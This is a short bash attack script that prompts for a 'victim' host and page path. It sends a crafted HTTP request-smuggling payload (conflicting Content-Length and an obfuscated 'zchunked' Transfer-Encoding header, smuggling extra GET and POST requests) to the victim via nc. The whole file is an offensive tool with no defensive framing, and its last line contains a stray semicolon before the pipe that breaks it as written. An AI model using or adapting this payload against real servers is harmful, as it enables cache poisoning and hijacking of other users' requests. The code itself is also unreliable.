#!/bin/bash
echo -ne "[+] Enter Victim: "
read victim

echo -ne "[+] Enter Path: "
read pagepath


echo "POST /$pagepath HTTP/1.1
Content-Length: 51
Transfer-Encoding: zchunked

11
=x&q=smuggling&x=
0

GET /404 HTTP/1.1
X: XPOST /search HTTP/1.1
Host: $victim"; | nc $victim 80